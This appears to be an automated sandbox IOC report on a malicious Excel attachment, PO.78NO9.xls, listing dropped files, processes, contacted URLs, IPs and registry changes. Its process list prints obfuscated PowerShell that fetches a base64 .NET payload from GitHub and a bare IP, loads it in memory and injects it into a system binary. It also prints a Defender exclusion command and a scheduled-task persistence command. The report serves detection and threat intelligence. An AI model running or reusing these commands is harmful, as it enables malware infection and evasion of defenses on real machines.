IOC Report
PO.78NO9.xls

loading gif

Files

File Path
Type
Category
Malicious
PO.78NO9.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 02:23:51 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmpB50D.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a080.url
MS Windows 95 Internet shortcut text (URL=<https://m2g.me/a080>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\m2g.me.url
MS Windows 95 Internet shortcut text (URL=<https://m2g.me/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\niLILOT.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PO.78NO9.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 06:15:10 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wegivenewthingssoonsweetness[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2189D102.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B6D35D3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91A11860.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A94A9A9A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B868B297.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6447CE1.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD34FD6E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D939ADF-D22B-4764-85FE-F2C4874C96D2}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87871A9B-F171-45A7-9BDE-800525B70DE1}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bpeako1v.iv2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\f2qlyded.z0u.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\sgp51cwp.evm.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\sxzt305u.qfk.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vlnsbxra.ovi.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\y3jhbpin.zig.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{25315524-A35C-49F4-829C-29A9CE27D164}
data
dropped
C:\Users\user\AppData\Local\Temp\{A6B14366-CBE2-47FB-A8DB-A1A1CBA8FDF5}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF8B1FFFD9F6395A18.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF971B86762C7AC513.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA8EE1EBE9F2E6F97.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\FC830000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 06:15:10 2024, Security: 1
dropped
C:\Users\user\Desktop\FC830000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 28 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Users\user\AppData\Roaming\niLILOT.exe
C:\Users\user\AppData\Roaming\niLILOT.exe
malicious
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
malicious
C:\Windows\System32\taskeng.exe
taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://38.240.41.28/333/RCCRER.txt
38.240.41.28
malicious
http://38.240.41.28/333/wegivenewthingssoonsweetness.tIF
38.240.41.28
malicious
www.lefeetlab.net/gwdv/
malicious
http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc
38.240.41.28
malicious
http://www.lingerie-16071.bond/gwdv/
unknown
http://www.lmodt.info/gwdv/
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://m2g.me/a080yX
unknown
http://tempuri.org/kursovaSQLDataSet.xsd
unknown
http://www.blackwavetattoostudio.comReferer:
unknown
http://www.divineworks.store
unknown
http://www.senior-dating-73474.bond/gwdv/www.lmodt.info
unknown
http://www.3dnu3uix.college
unknown
http://www.blackwavetattoostudio.com/gwdv/
unknown
https://nuget.org/nuget.exe
unknown
http://www.intelliflow.run/gwdv/
unknown
http://www.autoitscript.com/autoit3
unknown
http://crl.microsMR
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.lingerie-16071.bondReferer:
unknown
http://www.boyxlife.cyouReferer:
unknown
http://www.intelliflow.run/gwdv/www.3dnu3uix.college
unknown
http://www.boyxlife.cyou/gwdv/
unknown
http://www.my-tournament.live
unknown
http://www.nasocnite.xyz
unknown
http://www.divineworks.store/gwdv/
unknown
http://www.spanish-classes-13883.bond
unknown
http://www.highercall.net/gwdv/www.incronizid.dev
unknown
http://www.boyxlife.cyou
unknown
http://www.highercall.net/gwdv/
unknown
http://www.lefeetlab.netReferer:
unknown
https://contoso.com/Icon
unknown
http://www.lmodt.info/gwdv/www.divineworks.store
unknown
http://www.divineworks.store/gwdv/www.lingerie-16071.bond
unknown
http://www.lefeetlab.net/gwdv/
unknown
http://java.sun.com
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
https://raw.githubusercontent.com
unknown
http://www.my-tournament.liveReferer:
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.dental-implants-84866.bond/gwdv/
unknown
http://www.accountingcourse06.shop
unknown
https://m2g.me/
unknown
http://www.accountingcourse06.shop/gwdv/
unknown
http://www.highercall.netReferer:
unknown
http://www.spanish-classes-13883.bond/gwdv/www.intelliflow.run
unknown
http://www.3dnu3uix.college/gwdv/www.nasocnite.xyz
unknown
http://www.senior-dating-73474.bond
unknown
http://ocsp.entrust.net03
unknown
http://38.240.41.28
unknown
https://contoso.com/License
unknown
http://www.intelliflow.runReferer:
unknown
http://www.blackwavetattoostudio.com/gwdv/www.spanish-classes-13883.bond
unknown
http://www.divineworks.storeReferer:
unknown
http://go.micros
unknown
http://www.incronizid.devReferer:
unknown
http://www.nasocnite.xyzReferer:
unknown
http://www.spanish-classes-13883.bond/gwdv/
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfXh;
unknown
http://www.lingerie-16071.bond
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleane
unknown
https://contoso.com/
unknown
http://www.lefeetlab.net/gwdv/www.dental-implants-84866.bond
unknown
https://m2g.me/a080
14.194.50.211
http://www.lmodt.infoReferer:
unknown
http://www.dental-implants-84866.bondReferer:
unknown
http://www.accountingcourse06.shopReferer:
unknown
http://www.boyxlife.cyou/gwdv/www.blackwavetattoostudio.com
unknown
http://www.senior-dating-73474.bondReferer:
unknown
http://ocsp.entrust.net0D
unknown
http://www.dental-implants-84866.bond/gwdv/www.boyxlife.cyou
unknown
http://www.nasocnite.xyz/gwdv/
unknown
http://www.spanish-classes-13883.bondReferer:
unknown
http://www.blackwavetattoostudio.com
unknown
http://www.incronizid.dev/gwdv/www.lefeetlab.net
unknown
http://www.piriform.com/ccleanerxe
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.108.133
http://nuget.org/NuGet.exe
unknown
http://www.incronizid.dev/gwdv/
unknown
http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFC:
unknown
http://www.lingerie-16071.bond/gwdv/www.accountingcourse06.shop
unknown
http://www.my-tournament.live/gwdv/www.senior-dating-73474.bond
unknown
http://crl.entrust.net/server1.crl0
unknown
http://www.3dnu3uix.college/gwdv/
unknown
http://www.nasocnite.xyz/gwdv/P
unknown
http://www.lmodt.info
unknown
http://www.senior-dating-73474.bond/gwdv/
unknown
http://www.lefeetlab.net
unknown
http://www.dental-implants-84866.bond
unknown
http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFj
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://www.accountingcourse06.shop/gwdv/www.highercall.net
unknown
http://www.my-tournament.live/gwdv/
unknown
http://www.highercall.net
unknown
http://www.piriform.com/ccleaner
unknown
http://www.3dnu3uix.collegeReferer:
unknown
http://www.incronizid.dev
unknown
https://support.mozilla.org
unknown
https://secure.comodo.com/CPS0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
m2g.me
14.194.50.211
malicious
www.senior-dating-73474.bond
unknown
malicious
www.my-tournament.live
unknown
malicious
raw.githubusercontent.com
185.199.108.133

IPs

IP
Domain
Country
Malicious
14.194.50.211
m2g.me
India
malicious
38.240.41.28
unknown
United States
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{b0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\29E04
29E04
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1h0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38E3B
38E3B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38F44
38F44
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38FC1
38FC1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38F44
38F44
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
'k1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
4l1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://m2g.me/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
h*2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
